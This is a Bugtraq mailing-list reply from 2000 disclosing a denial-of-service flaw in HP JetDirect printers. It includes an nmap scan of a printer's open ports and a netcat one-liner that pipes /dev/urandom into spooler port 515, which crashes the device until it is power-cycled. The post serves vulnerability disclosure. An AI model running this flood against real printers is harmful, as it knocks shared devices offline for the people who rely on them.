Bugtraq mailing list archives

Re: DOS attack against HP JetDirect Printers (fwd)

From: john.bock () MARCHFIRST COM (John Bock)
Date: Fri, 21 Apr 2000 15:49:08 -0500

I've never seen nmap dos a HP4000 printer but they do die if you toss junk at
the spooler
port.  The printer display says 86.00x EIO 1 Error, and the red attention light
goes on.  At this
point you have to power the printer back on and off.  The rev's are the same as
yours (G.08.x)
so it should work for you. I think the other isssue is why are printers running
all these services?

 -John

# nmap -sT -PT 10.95.3.38

Starting nmap V. 2.30BETA20 by fyodor () insecure org ( www.insecure.org/nmap/ )
Interesting ports on  (10.95.3.38):
(The 1511 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
80/tcp     open        http
280/tcp    open        http-mgmt
515/tcp    open        printer
631/tcp    open        unknown
9100/tcp   open        jetdirect

Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds
# ping 10.95.3.38
PING 10.95.3.38 (10.95.3.38): 56 data bytes
^C
- --- 10.95.3.38 ping statistics ---
round-trip min/avg/max/stddev = 23.976/23.976/23.976/0.000 ms

# cat /dev/urandom | nc 10.95.3.38 515
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ^X^C punt! (give it a few minutes)